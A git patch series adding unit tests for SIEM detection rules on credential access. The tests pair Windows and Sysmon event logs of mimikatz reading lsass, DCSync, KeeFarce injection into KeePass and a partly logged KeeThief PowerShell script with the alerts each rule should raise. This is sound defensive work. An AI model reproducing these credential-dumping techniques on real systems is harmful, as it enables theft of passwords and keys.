"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\"},\"EventID\":\"4662\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"14080\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-06-05T19:35:22.922652800Z\"},\"EventRecordID\":\"102112088\",\"Correlation\":{\"ActivityID\":\"{87AC53AA-BE2B-4731-A426-7CB40A54D5A2}\"},\"Execution\":{\"ProcessID\":\"572\",\"ThreadID\":\"8132\"},\"Channel\":\"Security\",\"Computer\":\"ecsb003006a9.dc.atomic.local\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-18\"},{\"Name\":\"SubjectUserName\",\"text\":\"ECSB003006A9$\"},{\"Name\":\"SubjectDomainName\",\"text\":\"DC\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0x164d623881\"},{\"Name\":\"ObjectServer\",\"text\":\"DS\"},{\"Name\":\"ObjectType\",\"text\":\"%{19195a5b-6da0-11d0-afd3-00c04fd930c9}\"},{\"Name\":\"ObjectName\",\"text\":\"%{b5f76dbe-2a2e-4625-ab2a-66c5d1c71765}\"},{\"Name\":\"OperationType\",\"text\":\"Object Access\"},{\"Name\":\"HandleId\",\"text\":\"0x0\"},{\"Name\":\"AccessList\",\"text\":\"%%7688\"},{\"Name\":\"AccessMask\",\"text\":\"0x100\"},{\"Name\":\"Properties\",\"text\":\"%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {19195a5b-6da0-11d0-afd3-00c04fd930c9}\"},{\"Name\":\"AdditionalInfo\",\"text\":\"-\"},{\"Name\":\"AdditionalInfo2\"}]}}}", "category.generic": "Directory Service Object", "category.high": "System Management", "category.low": "Manipulation", "datafield2": "%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {19195a5b-6da0-11d0-afd3-00c04fd930c9}", "datafield5": "0x100", "event_src.category": "Operating system", "event_src.fqdn": "ecsb003006a9.dc.atomic.local", "event_src.host": "ecsb003006a9.dc.atomic.local", "event_src.hostname": "ecsb003006a9", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4662_An_operation_was_performed_on_an_object", "importance": "medium", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "4662", "normalized": true, "object": "ds_object", "object.name": "b5f76dbe-2a2e-4625-ab2a-66c5d1c71765", "object.type": "19195a5b-6da0-11d0-afd3-00c04fd930c9", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-05T20:50:52.204Z", "status": "success", "subject": "account", "subject.account.domain": "dc", "subject.account.id": "S-1-5-18", "subject.account.name": "ecsb003006a9$", "subject.account.session_id": "95787563137", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2023-06-05T19:35:22.922Z", "type": "raw", "uuid": "7d3b409a-6aae-4472-a6fd-f8873ac4c0ac"} + +# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "sync", "category.generic": "Attack", "category.high": "Credential Access", "category.low": "OS Credential Dumping: DCSync", "correlation_name": "DCSync", "correlation_type": "incident", "datafield2": "%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {19195a5b-6da0-11d0-afd3-00c04fd930c9}", "datafield5": "0x100", "event_src.category": "Operating system", "event_src.host": "ecsb003006a9.dc.atomic.local", "event_src.hostname": "ecsb003006a9", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "importance": "high", "incident.aggregation.key": "DCSync|ecsb003006a9.dc.atomic.local|ecsb003006a9$", "incident.aggregation.timeout": 600, "incident.category": "Undefined", "incident.severity": "high", "object": "account", "status": "success", "subject": "account", "subject.account.domain": "dc", "subject.account.id": "S-1-5-18", "subject.account.name": "ecsb003006a9$", "subject.account.session_id": "95787563137"} From 14f6eab5ef09cc13c7269d90c7b9195f5114ec57 Mon Sep 17 00:00:00 2001 From: shadow2033 <135636880+shadow2033@users.noreply.github.com> Date: Thu, 27 Jul 2023 14:14:37 +0300 Subject: [PATCH 06/57] =?UTF-8?q?=D0=94=D0=BE=D0=B1=D0=B0=D0=B2=D0=BB?= =?UTF-8?q?=D0=B5=D0=BD=D1=8B=20=D0=BC=D0=BE=D0=B4=D1=83=D0=BB=D1=8C=D0=BD?= =?UTF-8?q?=D1=8B=D0=B5=20=D1=82=D0=B5=D1=81=D1=82=D1=8B=20=D0=B4=D0=BB?= =?UTF-8?q?=D1=8F=20=D0=BF=D1=80=D0=B0=D0=B2=D0=B8=D0=BB=D0=B0=20(Dump=5Fl?= =?UTF-8?q?sass=5Fvia=5Fprocess=5Faccess)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../Dump_lsass_via_process_access/tests/test_1.sc | 3 +++ .../Dump_lsass_via_process_access/tests/test_2.sc | 3 +++ 2 files changed, 6 insertions(+) create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Dump_lsass_via_process_access/tests/test_1.sc create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Dump_lsass_via_process_access/tests/test_2.sc diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Dump_lsass_via_process_access/tests/test_1.sc b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Dump_lsass_via_process_access/tests/test_1.sc new file mode 100644 index 00000000..5b725967 --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Dump_lsass_via_process_access/tests/test_1.sc @@ -0,0 +1,3 @@ +{"action": "access", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"10\",\"Version\":\"3\",\"Level\":\"4\",\"Task\":\"10\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-03-17T19:37:11.6619304Z\"},\"EventRecordID\":\"4807\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"344\",\"ThreadID\":\"2032\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"PC04.example.corp\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-03-17 19:37:11.641\"},{\"Name\":\"SourceProcessGUID\",\"text\":\"{365abb72-a1e3-5c8e-0000-0010cef72200}\"},{\"Name\":\"SourceProcessId\",\"text\":\"3588\"},{\"Name\":\"SourceThreadId\",\"text\":\"2272\"},{\"Name\":\"SourceImage\",\"text\":\"C:\\\\Users\\\\IEUser\\\\Desktop\\\\mimikatz_trunk\\\\Win32\\\\mimikatz.exe\"},{\"Name\":\"TargetProcessGUID\",\"text\":\"{365abb72-0886-5c8f-0000-001030560000}\"},{\"Name\":\"TargetProcessId\",\"text\":\"476\"},{\"Name\":\"TargetImage\",\"text\":\"C:\\\\Windows\\\\system32\\\\lsass.exe\"},{\"Name\":\"GrantedAccess\",\"text\":\"0x1010\"},{\"Name\":\"CallTrace\",\"text\":\"C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+4595c|C:\\\\Windows\\\\system32\\\\KERNELBASE.dll+8185|C:\\\\Users\\\\IEUser\\\\Desktop\\\\mimikatz_trunk\\\\Win32\\\\mimikatz.exe+5c5a9|C:\\\\Users\\\\IEUser\\\\Desktop\\\\mimikatz_trunk\\\\Win32\\\\mimikatz.exe+5c86c|C:\\\\Users\\\\IEUser\\\\Desktop\\\\mimikatz_trunk\\\\Win32\\\\mimikatz.exe+5cbd2|C:\\\\Users\\\\IEUser\\\\Desktop\\\\mimikatz_trunk\\\\Win32\\\\mimikatz.exe+5c4ff|C:\\\\Users\\\\IEUser\\\\Desktop\\\\mimikatz_trunk\\\\Win32\\\\mimikatz.exe+3b3d3\"}]}}}", "category.generic": "Process", "category.high": "System Management", "category.low": "Manipulation", "datafield5": "2272", "datafield9": "C:\\Windows\\SYSTEM32\\ntdll.dll+4595c|C:\\Windows\\system32\\KERNELBASE.dll+8185|C:\\Users\\IEUser\\Desktop\\mimikatz_trunk\\Win32\\mimikatz.exe+5c5a9|C:\\Users\\IEUser\\Desktop\\mimikatz_trunk\\Win32\\mimikatz.exe+5c86c|C:\\Users\\IEUser\\Desktop\\mimikatz_trunk\\Win32\\mimikatz.exe+5cbd2|C:\\Users\\IEUser\\Desktop\\mimikatz_trunk\\Win32\\mimikatz.exe+5c4ff|C:\\Users\\IEUser\\Desktop\\mimikatz_trunk\\Win32\\mimikatz.exe+3b3d3", "event_src.category": "Other", "event_src.fqdn": "pc04.example.corp", "event_src.host": "pc04.example.corp", "event_src.hostname": "pc04", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_10_Process_access", "importance": "low", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "10", "normalized": true, "object": "process", "object.process.fullpath": "c:\\windows\\system32\\lsass.exe", "object.process.guid": "365abb72-0886-5c8f-0000-001030560000", "object.process.id": "476", "object.process.name": "lsass.exe", "object.process.path": "c:\\windows\\system32\\", "object.property": "GrantedAccess", "object.value": "0x1010", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-09T16:38:06.331Z", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\users\\ieuser\\desktop\\mimikatz_trunk\\win32\\mimikatz.exe", "subject.process.guid": "365abb72-a1e3-5c8e-0000-0010cef72200", "subject.process.id": "3588", "subject.process.name": "mimikatz.exe", "subject.process.path": "c:\\users\\ieuser\\desktop\\mimikatz_trunk\\win32\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-03-17T19:37:11.641Z", "type": "raw", "uuid": "1b631cff-9542-4c33-9781-9282db58e8a0"} + +expect 1 {"action": "access", "alert.context": "c:\\users\\ieuser\\desktop\\mimikatz_trunk\\win32\\mimikatz.exe -> c:\\windows\\system32\\lsass.exe", "alert.key": "c:\\users\\ieuser\\desktop\\mimikatz_trunk\\win32\\mimikatz.exe -> c:\\windows\\system32\\lsass.exe", "category.generic": "Attack", "category.high": "Credential Access", "category.low": "LSASS Memory", "correlation_name": "Dump_lsass_via_process_access", "correlation_type": "incident", "datafield5": "2272", "datafield9": "C:\\Windows\\SYSTEM32\\ntdll.dll+4595c|C:\\Windows\\system32\\KERNELBASE.dll+8185|C:\\Users\\IEUser\\Desktop\\mimikatz_trunk\\Win32\\mimikatz.exe+5c5a9|C:\\Users\\IEUser\\Desktop\\mimikatz_trunk\\Win32\\mimikatz.exe+5c86c|C:\\Users\\IEUser\\Desktop\\mimikatz_trunk\\Win32\\mimikatz.exe+5cbd2|C:\\Users\\IEUser\\Desktop\\mimikatz_trunk\\Win32\\mimikatz.exe+5c4ff|C:\\Users\\IEUser\\Desktop\\mimikatz_trunk\\Win32\\mimikatz.exe+3b3d3", "event_src.category": "Other", "event_src.fqdn": "pc04.example.corp", "event_src.host": "pc04.example.corp", "event_src.hostname": "pc04", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "importance": "high", "incident.aggregation.key": "Dump_lsass_via_process_access|pc04.example.corp|c:\\users\\ieuser\\desktop\\mimikatz_trunk\\win32\\mimikatz.exe", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "high", "object": "process", "object.process.fullpath": "c:\\windows\\system32\\lsass.exe", "object.process.guid": "365abb72-0886-5c8f-0000-001030560000", "object.process.id": "476", "object.process.name": "lsass.exe", "object.process.path": "c:\\windows\\system32\\", "object.property": "GrantedAccess", "object.value": "0x1010", "status": "success", "subject.process.fullpath": "c:\\users\\ieuser\\desktop\\mimikatz_trunk\\win32\\mimikatz.exe", "subject.process.guid": "365abb72-a1e3-5c8e-0000-0010cef72200", "subject.process.id": "3588", "subject.process.name": "mimikatz.exe", "subject.process.path": "c:\\users\\ieuser\\desktop\\mimikatz_trunk\\win32\\"} \ No newline at end of file diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Dump_lsass_via_process_access/tests/test_2.sc b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Dump_lsass_via_process_access/tests/test_2.sc new file mode 100644 index 00000000..b4bc7b29 --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Dump_lsass_via_process_access/tests/test_2.sc @@ -0,0 +1,3 @@ +{"action": "access", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"4663\",\"Version\":\"1\",\"Level\":\"0\",\"Task\":\"12802\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-06-09T19:34:19.602076800Z\"},\"EventRecordID\":\"82278\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"4\",\"ThreadID\":\"408\"},\"Channel\":\"Security\",\"Computer\":\"dc1.lab.local\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-21-1840087645-2506612525-4240436938-1000\"},{\"Name\":\"SubjectUserName\",\"text\":\"admin\"},{\"Name\":\"SubjectDomainName\",\"text\":\"LAB\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0x8bcb4\"},{\"Name\":\"ObjectServer\",\"text\":\"Security\"},{\"Name\":\"ObjectType\",\"text\":\"Process\"},{\"Name\":\"ObjectName\",\"text\":\"\\\\Device\\\\HarddiskVolume3\\\\Windows\\\\System32\\\\lsass.exe\"},{\"Name\":\"HandleId\",\"text\":\"0x314\"},{\"Name\":\"AccessList\",\"text\":\"%%4484\"},{\"Name\":\"AccessMask\",\"text\":\"0x10\"},{\"Name\":\"ProcessId\",\"text\":\"0x50c\"},{\"Name\":\"ProcessName\",\"text\":\"C:\\\\Users\\\\admin\\\\Downloads\\\\mimikatz_trunk\\\\x64\\\\mimikatz.exe\"},{\"Name\":\"ResourceAttributes\",\"text\":\"-\"}]}}}", "category.generic": "Unknown Entity", "category.high": "System Management", "category.low": "Manipulation", "datafield1": "0x314", "datafield5": "0x10", "event_src.category": "Operating system", "event_src.fqdn": "dc1.lab.local", "event_src.host": "dc1.lab.local", "event_src.hostname": "dc1", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4663_An_attempt_was_made_to_access_an_object", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "4663", "normalized": true, "object": "resource", "object.fullpath": "\\device\\harddiskvolume3\\windows\\system32\\lsass.exe", "object.name": "lsass.exe", "object.path": "\\device\\harddiskvolume3\\windows\\system32\\", "object.property": "GrantedAccess", "object.type": "process", "object.value": "0x10", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-09T20:02:17.507Z", "status": "success", "subject": "account", "subject.account.domain": "lab", "subject.account.id": "S-1-5-21-1840087645-2506612525-4240436938-1000", "subject.account.name": "admin", "subject.account.privileges": "%%4484", "subject.account.session_id": "572596", "subject.process.fullpath": "C:\\Users\\admin\\Downloads\\mimikatz_trunk\\x64\\mimikatz.exe", "subject.process.id": "1292", "subject.process.name": "mimikatz.exe", "subject.process.path": "C:\\Users\\admin\\Downloads\\mimikatz_trunk\\x64\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2023-06-09T19:34:19.602Z", "type": "raw", "uuid": "15575de4-d1b2-47f7-bd14-464c4a907e35"} + +expect 1 {"action": "access", "alert.context": "lab\\admin: C:\\Users\\admin\\Downloads\\mimikatz_trunk\\x64\\mimikatz.exe -> \\device\\harddiskvolume3\\windows\\system32\\lsass.exe", "alert.key": "C:\\Users\\admin\\Downloads\\mimikatz_trunk\\x64\\mimikatz.exe -> \\device\\harddiskvolume3\\windows\\system32\\lsass.exe", "category.generic": "Attack", "category.high": "Credential Access", "category.low": "LSASS Memory", "correlation_name": "Dump_lsass_via_process_access", "correlation_type": "incident", "datafield1": "0x314", "datafield5": "0x10", "event_src.category": "Operating system", "event_src.host": "dc1.lab.local", "event_src.hostname": "dc1", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "importance": "high", "incident.aggregation.key": "Dump_lsass_via_process_access|dc1.lab.local|C:\\Users\\admin\\Downloads\\mimikatz_trunk\\x64\\mimikatz.exe", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "high", "object": "resource", "object.fullpath": "\\device\\harddiskvolume3\\windows\\system32\\lsass.exe", "object.name": "lsass.exe", "object.path": "\\device\\harddiskvolume3\\windows\\system32\\", "object.property": "GrantedAccess", "object.type": "process", "object.value": "0x10", "status": "success", "subject": "account", "subject.account.domain": "lab", "subject.account.id": "S-1-5-21-1840087645-2506612525-4240436938-1000", "subject.account.name": "admin", "subject.account.privileges": "%%4484", "subject.account.session_id": "572596", "subject.process.fullpath": "C:\\Users\\admin\\Downloads\\mimikatz_trunk\\x64\\mimikatz.exe", "subject.process.id": "1292", "subject.process.name": "mimikatz.exe", "subject.process.path": "C:\\Users\\admin\\Downloads\\mimikatz_trunk\\x64\\"} \ No newline at end of file From 40948d72323e5cecfef508305c1a27bac4abd749 Mon Sep 17 00:00:00 2001 From: shadow2033 <135636880+shadow2033@users.noreply.github.com> Date: Thu, 27 Jul 2023 14:21:43 +0300 Subject: [PATCH 07/57] =?UTF-8?q?=D0=94=D0=BE=D0=B1=D0=B0=D0=B2=D0=BB?= =?UTF-8?q?=D0=B5=D0=BD=D1=8B=20=D0=BC=D0=BE=D0=B4=D1=83=D0=BB=D1=8C=D0=BD?= =?UTF-8?q?=D1=8B=D0=B5=20=D1=82=D0=B5=D1=81=D1=82=D1=8B=20=D0=B4=D0=BB?= =?UTF-8?q?=D1=8F=20=D0=BF=D1=80=D0=B0=D0=B2=D0=B8=D0=BB=D0=B0=20(KeePass?= =?UTF-8?q?=5FCredDump)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../mitre_attck_cred_access/KeePass_CredDump/tests/test_1.sc | 4 ++++ 1 file changed, 4 insertions(+) create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_cred_access/KeePass_CredDump/tests/test_1.sc diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/KeePass_CredDump/tests/test_1.sc b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/KeePass_CredDump/tests/test_1.sc new file mode 100644 index 00000000..b34c9661 --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/KeePass_CredDump/tests/test_1.sc @@ -0,0 +1,4 @@ +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"8\",\"Version\":\"2\",\"Level\":\"4\",\"Task\":\"8\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-04-27T18:47:00.0624748Z\"},\"EventRecordID\":\"7023\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"1816\",\"ThreadID\":\"1228\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"IEWIN7\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-04-27 18:47:00.062\"},{\"Name\":\"SourceProcessGuid\",\"text\":\"{365abb72-a3a4-5cc4-0000-001084960c00}\"},{\"Name\":\"SourceProcessId\",\"text\":\"1288\"},{\"Name\":\"SourceImage\",\"text\":\"C:\\\\Users\\\\Public\\\\KeeFarce.exe\"},{\"Name\":\"TargetProcessGuid\",\"text\":\"{365abb72-a201-5cc4-0000-00104f500800}\"},{\"Name\":\"TargetProcessId\",\"text\":\"2364\"},{\"Name\":\"TargetImage\",\"text\":\"C:\\\\Program Files\\\\KeePass Password Safe 2\\\\KeePass.exe\"},{\"Name\":\"NewThreadId\",\"text\":\"1920\"},{\"Name\":\"StartAddress\",\"text\":\"0x5A801260\"},{\"Name\":\"StartModule\",\"text\":\"C:\\\\Users\\\\Public\\\\BootstrapDLL.dll\"},{\"Name\":\"StartFunction\",\"text\":\"LoadManagedProject\"}]}}}", "category.generic": "Thread", "category.high": "Availability Management", "category.low": "Control", "datafield6": "0x5A801260", "event_src.category": "Other", "event_src.fqdn": "iewin7", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_8_Create_remote_thread", "importance": "low", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "8", "normalized": true, "object": "thread", "object.fullpath": "c:\\users\\public\\bootstrapdll.dll", "object.id": "1920", "object.name": "BootstrapDLL.dll", "object.path": "c:\\users\\public\\bootstrapdll.dll", "object.process.fullpath": "c:\\program files\\keepass password safe 2\\keepass.exe", "object.process.guid": "365abb72-a201-5cc4-0000-00104f500800", "object.process.id": "2364", "object.process.name": "keepass.exe", "object.process.path": "c:\\program files\\keepass password safe 2\\", "object.property": "start function", "object.value": "LoadManagedProject", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-05T14:33:22.264Z", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\users\\public\\keefarce.exe", "subject.process.guid": "365abb72-a3a4-5cc4-0000-001084960c00", "subject.process.id": "1288", "subject.process.name": "keefarce.exe", "subject.process.path": "c:\\users\\public\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-04-27T18:47:00.062Z", "type": "raw", "uuid": "87e5e3bb-0cd2-4859-b54c-a79d89e3d3d3"} + +# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "start", "alert.context": "BootstrapDLL.dll", "alert.key": "c:\\users\\public\\keefarce.exe|c:\\program files\\keepass password safe 2\\|iewin7", "category.generic": "Attack", "category.high": "Credential Access", "category.low": "Credentials from Password Stores: Password Managers", "correlation_name": "KeePass_CredDump", "correlation_type": "incident", "datafield6": "0x5A801260", "event_src.category": "Other", "event_src.fqdn": "iewin7", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "importance": "medium", "incident.aggregation.key": "KeePass_CredDump|iewin7|keefarce.exe", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "medium", "object": "thread", "object.process.fullpath": "c:\\program files\\keepass password safe 2\\keepass.exe", "object.process.guid": "365abb72-a201-5cc4-0000-00104f500800", "object.process.id": "2364", "object.process.name": "keepass.exe", "object.process.path": "c:\\program files\\keepass password safe 2\\", "object.property": "start function", "object.value": "LoadManagedProject", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\users\\public\\keefarce.exe", "subject.process.guid": "365abb72-a3a4-5cc4-0000-001084960c00", "subject.process.id": "1288", "subject.process.name": "keefarce.exe", "subject.process.path": "c:\\users\\public\\"} From 19ad9a877848bd7a667124cc239fec4a854f1983 Mon Sep 17 00:00:00 2001 From: shadow2033 <135636880+shadow2033@users.noreply.github.com> Date: Thu, 27 Jul 2023 14:54:54 +0300 Subject: [PATCH 08/57] =?UTF-8?q?=D1=80=D0=B0=D1=81=D1=88=D0=B8=D1=80?= =?UTF-8?q?=D0=B8=D0=BB=20=D0=BF=D0=BE=D0=BB=D1=8F=20=D0=B4=D0=B0=D0=BD?= =?UTF-8?q?=D0=BD=D1=8B=D1=85=20=D0=BA=D0=BE=D1=82=D0=BE=D1=80=D1=8B=D0=B5?= =?UTF-8?q?=20=D0=BC=D1=8B=20=D0=BE=D0=B6=D0=B8=D0=B4=D0=B0=D0=B5=D0=BC=20?= =?UTF-8?q?=D0=B4=D0=BB=D1=8F=20=D0=BF=D1=80=D0=B0=D0=B2=D0=B8=D0=BB=D0=B0?= =?UTF-8?q?=20(Keepass=5FKey=5FDump=5FVia=5FKeeThief).=20=D0=A3=D0=B4?= =?UTF-8?q?=D0=B0=D0=BB=D0=B8=D0=BB=20=D0=BF=D0=BE=D0=B2=D1=82=D0=BE=D1=80?= =?UTF-8?q?=D1=8F=D1=8E=D1=89=D0=B8=D0=B5=D1=81=D1=8F=20=D0=BC=D0=BE=D0=B4?= =?UTF-8?q?=D1=83=D0=BB=D1=8C=D0=BD=D1=8B=D0=B5=20=D1=82=D0=B5=D1=81=D1=82?= =?UTF-8?q?=D1=8B.?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../Keepass_Key_Dump_Via_KeeThief/tests/test_1.sc | 4 ++-- .../Keepass_Key_Dump_Via_KeeThief/tests/test_2.sc | 3 ++- .../Keepass_Key_Dump_Via_KeeThief/tests/test_3.sc | 7 ------- .../Keepass_Key_Dump_Via_KeeThief/tests/test_4.sc | 4 ---- 4 files changed, 4 insertions(+), 14 deletions(-) delete mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Keepass_Key_Dump_Via_KeeThief/tests/test_3.sc delete mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Keepass_Key_Dump_Via_KeeThief/tests/test_4.sc diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Keepass_Key_Dump_Via_KeeThief/tests/test_1.sc b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Keepass_Key_Dump_Via_KeeThief/tests/test_1.sc index 30d446fb..59c515e8 100644 --- a/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Keepass_Key_Dump_Via_KeeThief/tests/test_1.sc +++ b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Keepass_Key_Dump_Via_KeeThief/tests/test_1.sc @@ -1,4 +1,4 @@ {"action": "execute", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-PowerShell\",\"Guid\":\"{a0c1853b-5c40-4b15-8766-3cf1c58f985a}\"},\"EventID\":\"4104\",\"Version\":\"1\",\"Level\":\"3\",\"Task\":\"2\",\"Opcode\":\"15\",\"Keywords\":\"0x0\",\"TimeCreated\":{\"SystemTime\":\"2019-04-27T18:55:02.7106082Z\"},\"EventRecordID\":\"273644\",\"Correlation\":{\"ActivityID\":\"{83cf053f-9302-0000-d6c4-7b840293d901}\"},\"Execution\":{\"ProcessID\":\"7064\",\"ThreadID\":\"5708\"},\"Channel\":\"Microsoft-Windows-PowerShell/Operational\",\"Computer\":\"IEWIN7\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"text\":\"1\",\"Name\":\"MessageNumber\"},{\"text\":\"1\",\"Name\":\"MessageTotal\"},{\"text\":\"# requires -version 2\\n\\nfunction Get-KeePassDatabaseKey {\\n<# \\n .SYNOPSIS\\n \\n Retrieves database mastey key information for unlocked KeePass database.\\n\\n Function: Get-KeePassDatabaseKey\\n Author: Lee Christensen (@tifkin_), Will Schroeder (@harmj0y)\\n License: BSD 3-Clause\\n Required Dependencies: None\\n Optional Dependencies: None\\n\\n .DESCRIPTION\\n \\n Enumerates any KeePass 2.X (.NET) processes currently open, or takes a process object on the pipeline.\\n Loades the C# KeeTheft assembly into memory and for each open KeePass process executes the GetKeePassMasterKeys()\\n method on it. GetKeePassMasterKeys() will attach to the target KeePass process using CLR MD and enumerate\\n all CLR heap objects, searching for a KeePassLib.PwDatabase object. If one is found, the path is extracted\\n from the m_strUrl field, and all referenced objects are enumerated, searching for a KeePassLib.Keys.CompositeKey.\\n If a composite master key is found, information for each key type (KcpPassword, KcpKeyFile, KcpUserAccount)\\n is extracted, including the DPAPI encrypted data blobs of key data. For any encrypted blobs found, shellcode\\n is injected into the KeePass process that calls MyRtlDecryptMemory() to decrypt the DPAPI memory blobs,\\n returning the plaintext/unprotected key data.\\n\\n .PARAMETER Process\\n\\n Optional KeePass process object to pass in on the pipeline.\\n\\n .EXAMPLE\\n\\n PS C:\\\\> Get-KeePassDatabaseKey -Verbose\\n VERBOSE: Examining KeePass process 4184 for master keys\\n\\n\\n Database : C:\\\\Users\\\\harmj0y.TESTLAB\\\\Desktop\\\\keepass\\\\NewDatabase.kdbx\\n KeyType : KcpUserAccount\\n 